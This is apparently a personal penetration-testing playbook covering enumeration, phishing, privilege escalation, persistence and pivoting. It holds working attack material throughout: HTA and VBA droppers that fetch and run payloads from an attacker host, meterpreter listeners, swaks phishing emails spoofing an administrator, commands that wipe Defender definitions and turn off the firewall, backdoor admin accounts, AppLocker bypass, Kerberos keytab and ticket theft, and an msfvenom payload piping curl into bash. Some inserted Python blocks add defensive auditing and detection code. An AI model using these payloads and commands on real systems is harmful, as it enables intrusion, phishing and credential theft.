# Hacking

# Fresh builds

# pimp-my-kali

I use this to install the tools I rely on, such as impacket.

# .zshrc modifications

I've created several aliases that I use throughout my hacking:

```bash
# custom aliases
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
alias diff='diff --color=auto'
alias ip='ip --color=auto'
# aliases cannot use "$1"; arguments are appended automatically (note: this shadows the ss(8) socket tool)
alias ss='searchsploit'
alias l='ls -lAh'
alias webup='ls -lah && ip a | grep tun0 && python3 -m http.server 8000'
alias rtfm="/opt/rtfm/rtfm.py"
alias xclip="xclip -sel c"
alias ltr="ls -ltr"
alias cdb="echo /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | xclip"
alias clearwhite="sed 's/^[ \t]*//' -i"
alias thm="sudo openvpn /home/chevalier/Documents/vpn/thm/Chevalier.ovpn"
alias htb="sudo openvpn /home/chevalier/Documents/vpn/htb/lab_Chevalier.ovpn"
alias update="sudo apt update -y && sudo apt upgrade -y && sudo apt dist-upgrade -y"
alias buster="gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 64 -x .txt,.php,.html,.aspx -u"
```

# Structure

I keep my VPN settings under `~/Documents/vpn/platform_name/` and all my labs or challenges under `~/labs/platform_name`.

# What else?

```bash
sudo msfdb init
sudo apt install bloodyad
sudo apt install terminator
pipx install updog3
```

- Configure bloodhound
- Configure ligolo-ng

# Browser plugins

- Hack-Tools: similar to revshells
- Wappalyzer: CMS identification
- User-Agent Switcher: exactly what it says on the tin
- FoxyProxy: for Burp Suite

# Cheatsheets

# Quick Checklist

### Personal Checklist

- [ ] Enumeration
    - [ ] nmap
    - [ ] autorecon
        - [ ] HTTP/S?
            - [ ] gobuster/dirbuster
            - [ ] nikto
            - [ ] wpscan
- [ ] User - Privesc
    - [ ] id
        - [ ] lxd
    - [ ] sudo -l
        - [ ] gtfobins
    - [ ] [linpeas.sh](https://github.com/carlospolop/PEASS-ng)
        - [ ] SUID/SGID - gtfobins
    - [ ] linenum.sh
        - [ ] SUID/SGID - gtfobins
    - [ ] cronjobs
- [ ] Root
    - [ ] Profit!

**Markdown version**

```markdown
# Checklist

- [ ] Enumeration
	- [ ] nmap
	- [ ] autorecon
		- [ ] HTTP/S?
			- [ ] gobuster/dirbuster
			- [ ] nikto
			- [ ] wpscan
- [ ] User - Privesc
	- [ ] id
		- [ ] lxd
	- [ ] sudo -l
		- [ ] gtfobins
	- [ ] [linpeas.sh](https://github.com/carlospolop/PEASS-ng)
		- [ ] SUID/SGID - gtfobins
	- [ ] linenum.sh
		- [ ] SUID/SGID - gtfobins
	- [ ] cronjobs
- [ ] Root
	- [ ] Profit!
```

# Advanced Methodology

# 1. Enumeration

# Automated approach

```bash
autorecon TARGET_IP
```

# Manual approach

```bash
nmap TARGET_IP -p- --min-rate 1400 -sV -T 4 -sC -oN output.txt
```

> **Warning:** If the target is Windows, use the commands below.

```bash
nmap TARGET_IP -Pn -sV -T 4 -sC -oN output.txt

#or this if you want to dive deeper

nmap TARGET_IP -Pn -p- -sV -T 4 -sC -oN output.txt
```

# 2. Initial Access

# Phishing

# HTA payloads

## Ping

```html
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
// -n takes a count; without it ping rejects the argument
var res = shell.Run("ping -n 1 YOUR_IP");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
```

### TCPdump

To catch the ping on the VPN interface:

```bash
sudo tcpdump -i tun0 icmp
```

## HTA - Bypass CLM

1. Compile the project [https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM)
2. Convert the binary to psby.txt using certutil

    ```cmd
    certutil -encode "Z:\tools\02.CLM\revshell\PSBypassCLM\PSBypassCLM\bin\x64\Release\PsBypassCLM.exe" psby.txt
    ```
3. Copy psby.txt to the Kali host, serve it over HTTP and deliver it with the following dropper

    ```html
    <html>
    <head>
    <script language="JScript">
    var shell = new ActiveXObject("WScript.Shell");
    var res = shell.Run("powershell iwr -uri http://YOUR_IP/psby.txt -outfile C:\\windows\\tasks\\enc.txt; powershell certutil -decode C:\\windows\\tasks\\enc.txt C:\\windows\\tasks\\psby.exe; C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=true /revshell=true /rhost=YOUR_IP /rport=443 /amsi=0 /U C:\\windows\\tasks\\psby.exe");
    </script>
    </head>
    <body>
    <script language="JScript">
    self.close();
    </script>
    </body>
    </html>
    ```

## HTA - With Meterpreter

1. Generate the shellcode

    ```bash
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f csharp EXITFUNC=thread
    ```
2. Run it through [XORme](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/00.encoders/XORme)
3. Update [hollow.xml](https://github.com/blu3drag0nsec/osepvs/blob/main/tools/04.processhollowing/hollow.xml) with the code from above
4. Set up the listener

    ```bash
    msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443; set exitfunc thread; exploit -j"
    ```
5. Deliver it

    ```html
    <html>
    <head>
    <script language="JScript">
    var shell = new ActiveXObject("WScript.Shell");
    var res = shell.Run("powershell iwr -uri http://YOUR_IP/hollow.xml -outfile C:\\windows\\tasks\\hollow.xml; C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\tasks\\hollow.xml");
    </script>
    </head>
    <body>
    <script language="JScript">
    self.close();
    </script>
    </body>
    </html>
    ```

# Macro VBA

1. Generate the shellcode
    
    ```bash
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp
    ```
2. Run it through the [Caesar cipher](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/00.encoders/vba-caesar) encoder - pay attention to the `shift` and `key` parameters.
3. Set up listener
    
    ```bash
    msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j"
    ```
4. Update the [vba](https://4259749503-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIjMGokTUMT5MhpNldrsd%2Fuploads%2Fgit-blob-a682776c87af9345bc612d01077f47198088f48c%2Foffice-vba-macro.txt?alt=media) with your shellcode from step 2.

# Sending emails

## swaks

### HTA payloads

```bash
swaks --body 'Please check this issue here http://YOUR_IP/payload.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Issues with my account" -t Will@domain.com -f administrator@domain.com --server EMAIL_server
```

### Macro payloads

```bash
swaks --to jobs@domain.com --from administrator@domain.com --header "Subject: My CV" --body "Attached my cv to this email" --attach @cv.docm --server server.domain.tld
```


# 3. Privilege Escalation - Windows

# PowerUp

1. Upload PowerUp.ps1 to the target; on Kali it lives at `/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1`
2. Load it on the target and run all checks

    ```powershell
    . .\PowerUp.ps1
    Invoke-AllChecks
    ```
3. If an abuse fails, check that the service you are targeting is actually started.

### Abusing services

```powershell
. .\PowerUp.ps1
Invoke-AllChecks   # if a modifiable service is reported, abuse it with the line below
Invoke-ServiceAbuse -Name 'Service'
```

```powershell
# call sc.exe explicitly: inside PowerShell, sc is an alias for Set-Content
# sc.exe requires a space after the "=" of each option
sc.exe query Service
sc.exe config Service start= auto
sc.exe config Service obj= LocalSystem
```

# 4. Post Compromise

1. Blast AV and enable RDP with hashes

    ```cmd
    cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
    NetSh Advfirewall set allprofiles state off
    cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
    ```
2. SharpHound → BloodHound
3. Dump all hashes and spray them against
    1. SMB
    2. WinRM
    3. LDAP
    4. WMI

# 5. Persistence

# Linux - SSH

On your host

```bash
cat ~/.ssh/id_rsa.pub   # if you don't have one, create it with: ssh-keygen -t rsa
# copy the content of the file into authorized_keys on the target host
```

On the target host

```bash
cd ~/.ssh/
ssh-keygen -t rsa   # press enter twice
cat id_rsa.pub >> authorized_keys   # append, so existing keys are not clobbered
echo 'YOUR_PUB_KEY' >> authorized_keys
```
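The defender-side counterpart of the persistence step above, added here as an example (it is not part of the original notes): parse `authorized_keys` entries including the options field, compute each key's SHA256 fingerprint in the form `ssh-keygen -l` reports, and list every key that is not on an approved baseline. The sample file and its key blobs are constructed from dummy bytes and are not real keys.

```python
"""Audit authorized_keys against a baseline of approved key fingerprints.

Added example, not code from the original notes. The sample file and the key
blobs in it are constructed (dummy bytes), not real keys.
"""
import base64
import hashlib
import re
import struct

KEY_TYPES = (
    "ssh-rsa", "ssh-ed25519", "ssh-dss",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
)
# split option lists on commas that are not inside double quotes
OPTION_SPLIT = re.compile(r',(?=(?:[^"]*"[^"]*")*[^"]*$)')


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def blob_type(blob_b64):
    """Key type embedded in the blob (its first SSH string); should match the declared type."""
    raw = base64.b64decode(blob_b64)
    (n,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + n].decode("ascii", "replace")


def _split_options(line):
    """Options end at the first whitespace that is not inside double quotes."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_quotes = not in_quotes
        elif ch in " \t" and not in_quotes:
            return line[:i], line[i + 1:].lstrip()
    return line, ""


def parse_authorized_keys(text):
    """One dict per key line: type, fingerprint, comment, options, type_mismatch."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        options = ""
        if line.split(None, 1)[0] not in KEY_TYPES:   # leading options field present
            options, line = _split_options(line)
        parts = line.split(None, 2)
        if len(parts) < 2 or parts[0] not in KEY_TYPES:
            entries.append({"line": lineno, "error": "unparseable entry"})
            continue
        declared, blob = parts[0], parts[1]
        entries.append({
            "line": lineno,
            "type": declared,
            "fingerprint": fingerprint(blob),
            "comment": parts[2] if len(parts) == 3 else "",
            "options": [o for o in OPTION_SPLIT.split(options) if o],
            "type_mismatch": blob_type(blob) != declared,
        })
    return entries


def unknown_keys(entries, approved):
    """Entries whose fingerprint is not in the approved set, plus unparseable lines."""
    return [e for e in entries if "error" in e or e["fingerprint"] not in approved]


# --- constructed sample data (dummy key material) ----------------------------
def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def _blob(*fields):
    return base64.b64encode(b"".join(_ssh_string(f) for f in fields)).decode()


OPS_KEY = _blob(b"ssh-ed25519", b"\x01" * 32)
BACKUP_KEY = _blob(b"ssh-ed25519", b"\x02" * 32)
ROGUE_KEY = _blob(b"ssh-rsa", b"\x01\x00\x01", b"\x00\xc3" + b"\x11" * 8)

SAMPLE_AUTHORIZED_KEYS = f"""\
# constructed sample; none of these blobs is a real key
ssh-ed25519 {OPS_KEY} ops@bastion
from="10.0.0.0/8",no-pty ssh-ed25519 {BACKUP_KEY} backup-job
ssh-rsa {ROGUE_KEY} unknown-laptop
"""
APPROVED = {fingerprint(OPS_KEY), fingerprint(BACKUP_KEY)}

if __name__ == "__main__":
    for e in unknown_keys(parse_authorized_keys(SAMPLE_AUTHORIZED_KEYS), APPROVED):
        print(f"line {e['line']}: unapproved key {e.get('fingerprint')} ({e.get('comment')})")
```

Run against a real file with `parse_authorized_keys(open(path).read())` and a baseline set built from the fingerprints you have on record; a key whose fingerprint is absent from the baseline, or whose embedded type does not match the declared one, is the thing to investigate.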

# Windows

## Create admin user

```cmd
cmd.exe /c net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman
```

or, directly from a command prompt:

```cmd
net user hackerman Password123! /add && net localgroup "administrators" /add hackerman && net localgroup "remote desktop users" /add hackerman
```

## Enable RDP

```cmd
cmd.exe /c netsh firewall set opmode disable && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
```

or, one command at a time:

```cmd
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
```

# 6. Pivot

> **Warning:** You can use the standard apt repos if you don't need to make any modifications, e.g. bypassing AppLocker or CLM.

```bash
sudo apt install ligolo-ng ligolo-ng-common-binaries -y
```

# Basic tunnel

1. Start `ligolo-proxy`

    ```bash
    sudo ligolo-proxy -selfcert
    ```
2. Connect the agent
3. Enter the session and list the network configuration

    ```bash
    # in the ligolo-ng prompt
    session
    ifconfig
    ```
4. Set the route
    1. 1 hop

        ```bash
        autoroute
        start
        ```
    2. 2 hops

## AV evasion

1. Clone the repository

    ```bash
    git clone https://github.com/nicocha30/ligolo-ng.git
    ```
2. Edit the `ignoreCertificate` and `serverAddr` variables in the following file: `/ligolo-ng/cmd/agent/main.go`
3. Compile `agent.exe` using the following command

    ```bash
    GOOS=windows go build -o agent.exe cmd/agent/main.go
    ```
4. Compile as `x64` and give it the name `ApplockerBypassExternalBinary.exe` - [Github Repo](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/06.applocker/ApplockerBypassExternalBinary)
5. Encode the file created above with certutil

    ```cmd
    certutil.exe -encode .\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt
    ```
6. Rename `agent.exe` to `ligolo-agent.exe`
7. Serve the files (`ligolo-agent.exe` and `AppLockerBypassLigolo.txt`)
8. Upload the files to the target

# Linux AD

Tools required

- https://github.com/its-a-feature/KeytabParser
- https://github.com/sosdave/KeyTabExtract

I usually install them under `/opt/linuxad`.

You will need to upload them onto the target host.

## Extracting keytab data

You will most likely need to be root to do this:

```bash
python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
./keytabextract.py /etc/krb5.keytab
```
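As an added example (not part of the original notes, and not the code of KeytabParser or KeyTabExtract), here is a minimal reader for the MIT keytab format (version 0x502) that reports what `klist -k` shows for each entry, principal, kvno and enctype, and flags which principals still carry DES or RC4 keys, without returning the key bytes. The sample keytab is assembled inside the block from dummy key material.

```python
"""List principals and encryption types in a Kerberos keytab (MIT format 0x502).

Added example, not code from the original notes or from the keytab tools it
links. The sample keytab below is constructed from dummy key bytes.
"""
import struct

ENCTYPE_NAMES = {
    1: "des-cbc-crc", 3: "des-cbc-md5",
    17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
    23: "rc4-hmac",
}
WEAK_ENCTYPES = {1, 3, 23}   # DES, and RC4 (whose key is the NT hash)


def _octets(b):
    """counted_octet_string: uint16 length followed by the bytes."""
    return struct.pack(">H", len(b)) + b


def build_keytab(entries):
    """Assemble a version 0x502 keytab from (principal, enctype, key, kvno, timestamp).
    Only used here to construct sample input; never write real keys this way."""
    out = b"\x05\x02"
    for principal, enctype, key, kvno, ts in entries:
        name, realm = principal.rsplit("@", 1)
        comps = name.split("/")
        body = struct.pack(">H", len(comps)) + _octets(realm.encode())
        for c in comps:
            body += _octets(c.encode())
        body += struct.pack(">IIB", 1, ts, kvno & 0xFF)     # name_type=KRB5_NT_PRINCIPAL, timestamp, vno8
        body += struct.pack(">H", enctype) + _octets(key)    # keyblock
        body += struct.pack(">I", kvno)                      # optional 32-bit vno
        out += struct.pack(">i", len(body)) + body
    return out


class _Reader:
    def __init__(self, data, pos):
        self.data, self.pos = data, pos

    def unpack(self, fmt):
        vals = struct.unpack_from(fmt, self.data, self.pos)
        self.pos += struct.calcsize(fmt)
        return vals

    def octets(self):
        (n,) = self.unpack(">H")
        s = self.data[self.pos:self.pos + n]
        self.pos += n
        return s


def parse_keytab(data):
    """Return one dict per live entry; the key bytes are consumed but never returned."""
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab format version 0x502 is handled here")
    entries, pos = [], 2
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size == 0:
            break
        if size < 0:              # a negative size marks a deleted slot of that length
            pos -= size
            continue
        r = _Reader(data, pos)
        (ncomp,) = r.unpack(">H")
        realm = r.octets().decode("utf-8", "replace")
        comps = [r.octets().decode("utf-8", "replace") for _ in range(ncomp)]
        _name_type, timestamp, vno8 = r.unpack(">IIB")
        (enctype,) = r.unpack(">H")
        r.octets()                # key material: skipped on purpose
        kvno = vno8
        if pos + size - r.pos >= 4:   # 32-bit vno is present only if 4+ bytes remain
            (kvno,) = r.unpack(">I")
        pos += size
        entries.append({
            "principal": "/".join(comps) + "@" + realm,
            "enctype": enctype,
            "enctype_name": ENCTYPE_NAMES.get(enctype, f"etype-{enctype}"),
            "kvno": kvno,
            "timestamp": timestamp,
        })
    return entries


def weak_entries(entries):
    """Principals that have at least one DES or RC4 key in the keytab."""
    return sorted({e["principal"] for e in entries if e["enctype"] in WEAK_ENCTYPES})


# Constructed sample: a host key with AES256 and RC4 entries, plus an RC4-only service account.
SAMPLE_KEYTAB = build_keytab([
    ("host/web01.lab.local@LAB.LOCAL", 18, b"\x11" * 32, 2, 1700000000),
    ("host/web01.lab.local@LAB.LOCAL", 23, b"\x22" * 16, 2, 1700000000),
    ("svc_backup@LAB.LOCAL", 23, b"\x33" * 16, 5, 1700000100),
])

if __name__ == "__main__":
    for e in parse_keytab(SAMPLE_KEYTAB):
        print(f"{e['kvno']:>3}  {e['principal']}  ({e['enctype_name']})")
    print("principals with weak enctypes:", weak_entries(parse_keytab(SAMPLE_KEYTAB)))
```

On a real host, `parse_keytab(open("/etc/krb5.keytab", "rb").read())` gives the same listing as `klist -k` plus the weak-enctype report; because the function never hands back key bytes it is safe to run as an inventory check, and any RC4 entry it reports is exactly what the extraction tools above would turn into a crackable hash.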

# CCACHE ticket

```bash
ls /tmp/ | grep krb5cc   # usual location
```

To reuse a ticket:

1. Get a copy of the file onto your Kali host
2. Change the permissions of the file to 600 using `chmod 600 <name of the file>`
3. Set the environment variable: `export KRB5CCNAME=/location/ticket_name`

# Blast Defender

# Via command prompt

```cmd
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
```

Just to be safe 🙂

```cmd
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
NetSh Advfirewall set allprofiles state off
```

# Powershell

```powershell
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
```
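Every registry command in the "Post Compromise", "Enable RDP" and "Blast Defender" sections writes a well-known DWORD under HKLM, which is what makes them easy to watch for. The detection side, added here as an example that is not code from the original notes, is a watchlist run over Sysmon Event ID 13 (RegistryEvent, value set) records: the field names (`TargetObject`, `Details`, `Image`) are Sysmon's, the event records are constructed samples, and the key paths are the ones used on this page.

```python
"""Flag registry writes that switch Defender off or open RDP.

Added example, not code from the original notes. Runs a watchlist over records
shaped like Sysmon Event ID 13 (RegistryEvent: Value Set); the records below
are constructed samples.
"""
import re

# (key path below HKLM, value name, DWORD data that signals tampering, description), all lower-case
WATCHLIST = [
    (r"software\policies\microsoft\windows defender", "disablerealtimemonitoring", 1,
     "Defender real-time monitoring disabled via policy"),
    (r"software\policies\microsoft\windows defender", "disablebehaviormonitoring", 1,
     "Defender behaviour monitoring disabled via policy"),
    (r"system\currentcontrolset\control\terminal server", "fdenytsconnections", 0,
     "RDP connections enabled"),
    (r"system\currentcontrolset\control\lsa", "disablerestrictedadmin", 0,
     "RestrictedAdmin RDP logon enabled"),
]

HIVE_RE = re.compile(r"^(?:HKEY_LOCAL_MACHINE|HKLM)\\", re.IGNORECASE)
DWORD_RE = re.compile(r"DWORD\s*\((0x[0-9a-f]+)\)", re.IGNORECASE)


def normalise(target):
    """Drop the HKLM hive prefix (either spelling) and lower-case the rest."""
    return HIVE_RE.sub("", target).lower()


def check_event(event):
    """Return a finding string for a watchlisted Value Set event, else None."""
    if event.get("EventID") != 13:
        return None
    path = normalise(event.get("TargetObject", ""))
    key, _, value_name = path.rpartition("\\")
    m = DWORD_RE.search(event.get("Details", ""))
    if not m:
        return None   # only DWORD policy values are on the watchlist
    data = int(m.group(1), 16)
    for wl_key, wl_value, bad_data, desc in WATCHLIST:
        if key == wl_key and value_name == wl_value and data == bad_data:
            return f"{desc}: {event['TargetObject']} written by {event.get('Image', '?')}"
    return None


def scan(events):
    """All findings, in event order."""
    return [f for f in map(check_event, events) if f]


# Constructed sample events (shape follows Sysmon EventID 13).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableRealtimeMonitoring",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    # an admin turning RDP back off must not fire
    {"EventID": 13, "Image": r"C:\Windows\System32\SystemPropertiesRemote.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000001)"},
    # key creation (EventID 12) carries no value data and is ignored
    {"EventID": 12, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin",
     "Details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The hive normalisation matters because `reg add` accepts both `HKLM` and `HKEY_LOCAL_MACHINE`, as the commands above do, while Sysmon records whichever form was used; matching on the value's data rather than on the write alone keeps an administrator re-enabling protection from raising the same alert.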

# Tools

# autorecon

# Basic usage

```bash
autorecon TARGET_IP
```

Scanning multiple hosts

```bash
autorecon -t targets.txt
#or the below
sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv
```

# nmap

### Base Syntax

```bash
nmap {Targets} [ScanType] [Options]
```

### Target

| Purpose | Example |
| --- | --- |
| 1 target | `nmap IP` |
| scan multiple targets | `nmap IP1 IP2 IP3` |
| scan a list | `nmap -iL list.txt` |
| scan CIDR range | `nmap 192.168.1.0/24` |

### Ports

| Purpose | Example |
| --- | --- |
| Scan top 1k popular ports | `nmap IP` |
| Port range | `nmap -p x-y` |
| Port list | `nmap -p x,y,z` |
| linear port range (no randomisation) | `nmap -r -p x-y` |

### Probing

| Purpose | Example |
| --- | --- |
| Don't probe | `nmap IP -Pn` |
| Default probe | `nmap IP -PB` |
| ICMP Echo Request | `nmap IP -PE` |
| ICMP Timestamp Request | `nmap IP -PP` |
| ICMP Netmask Request | `nmap IP -PM` |

### Scan Type

| Purpose | Example |
| --- | --- |
| Probe only | `nmap IP -sn` |
| SYN Scan | `nmap IP -sS` |
| TCP Connect Scan | `nmap IP -sT` |
| UDP Scan | `nmap IP -sU` |
| Version scan | `nmap IP -sV` |
| OS Detection | `nmap IP -O` |
| Set TCP flags | `nmap IP --scanflags SYNFIN` |

### Timing Options

| Purpose | Example |
| --- | --- |
| Paranoid | `nmap IP -T0` |
| Sneaky | `nmap IP -T1` |
| Polite | `nmap IP -T2` |
| Normal | `nmap IP -T3` |
| Aggressive | `nmap IP -T4` |
| Insane | `nmap IP -T5` |

### Output Format

| Purpose | Example |
| --- | --- |
| Standard | `nmap IP -oN file.txt` |
| Greppable | `nmap IP -oG file.txt` |
| XML | `nmap IP -oX file.txt` |
| all formats | `nmap IP -oA file` |

### Misc Options

| Purpose | Example |
| --- | --- |
| Aggressive scan | `nmap IP -A` |
| nmap reason why a port is in a state | `nmap IP --reason` |
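The `-oG` format from the Output Format table is the easiest to post-process. As an added example that is not part of the original cheatsheet, the following parses greppable output into per-host port lists so a scan can be filtered for a service (the `ms-wbt-server` lookup below picks out hosts with RDP exposed). The scan text is a constructed sample, not real output.

```python
"""Parse nmap greppable (-oG) output into per-host port lists.

Added example, not part of the original cheatsheet. -oG prints one host per
line with tab-separated "Field: value" sections; the sample is constructed.
"""
import re
from dataclasses import dataclass, field

SAMPLE_OG = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sV -oG out.gnmap 10.10.10.0/30
Host: 10.10.10.1 ()\tStatus: Up
Host: 10.10.10.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/, 80/open/tcp//http//nginx 1.18.0/, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 10.10.10.2 (dc01.lab.local)\tPorts: 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos/, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: closed (997)
# Nmap done at Mon Jan  1 00:00:10 2024 -- 4 IP addresses (2 hosts up) scanned in 10.00 seconds
"""


@dataclass
class Port:
    number: int
    state: str
    proto: str
    service: str
    version: str


@dataclass
class Host:
    ip: str
    hostname: str
    ports: list = field(default_factory=list)


HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def parse_gnmap(text):
    """Return {ip: Host}; a host may appear on several lines (Status, then Ports)."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comment and "Nmap done" lines
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        host = hosts.setdefault(ip, Host(ip, hostname))
        for f in fields[1:]:
            if not f.startswith("Ports:"):
                continue
            for entry in f[len("Ports:"):].split(","):
                # each entry is port/state/proto/owner/service/rpc/version/
                parts = entry.strip().split("/")
                if len(parts) < 7:
                    continue
                host.ports.append(Port(int(parts[0]), parts[1], parts[2], parts[4], parts[6]))
    return hosts


def open_ports(hosts, ip):
    """Sorted open port numbers for one host."""
    return sorted(p.number for p in hosts[ip].ports if p.state == "open")


def hosts_with_service(hosts, name):
    """IPs that expose the named service in the open state (e.g. ms-wbt-server for RDP)."""
    return sorted(ip for ip, h in hosts.items()
                  if any(p.state == "open" and p.service == name for p in h.ports))


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_OG)
    for ip, h in hosts.items():
        print(ip, h.hostname or "-", open_ports(hosts, ip))
    print("RDP exposed on:", hosts_with_service(hosts, "ms-wbt-server"))
```

Feed it a real file with `parse_gnmap(open("file.txt").read())` after an `-oG file.txt` (or `-oA`) scan; the same structure is what `-oX` gives you with less parsing, so prefer XML when a tool already understands it.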

# wpscan

# Basic usage

```bash
wpscan --url http://TARGET_IP
```

Scan for plugins

```bash
wpscan --url http://TARGET_IP -e p
```

Scan for users

```bash
wpscan --url http://TARGET_IP -e u
```

Scan for vulnerable plugins

```bash
wpscan --url http://TARGET_IP -e vp
```

Brute force passwords

```bash
wpscan --url http://TARGET_IP --passwords /usr/share/wordlists/rockyou.txt
```

# ffuf

# Basic Usage

```bash
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ
```

# nikto

# Basic usage

```bash
nikto -host http://TARGET_IP -p PORT
```

# gobuster

# Basic usage

```bash
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
```

Enumerating with extensions (pick the extensions that match the target's stack)

```bash
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py,html,aspx
```

Enumerating vhosts (after adding the hostname to `/etc/hosts`)

```bash
gobuster vhost -u http://hostname.domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
```

# netexec

# Enumeration

## SMB

```bash
netexec smb targets.txt -u user_name -H 'NTLM_HASH'
```

```bash
netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol
```

## winrm

```bash
netexec winrm targets.txt -u user_name -H 'NTLM_HASH'
```

# powerview

### 1. Enumerate common names

```powershell
Get-DomainComputer | select cn
```

# msf

# Linux payloads

## With commands

```bash
msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf
```

# Windows

```bash
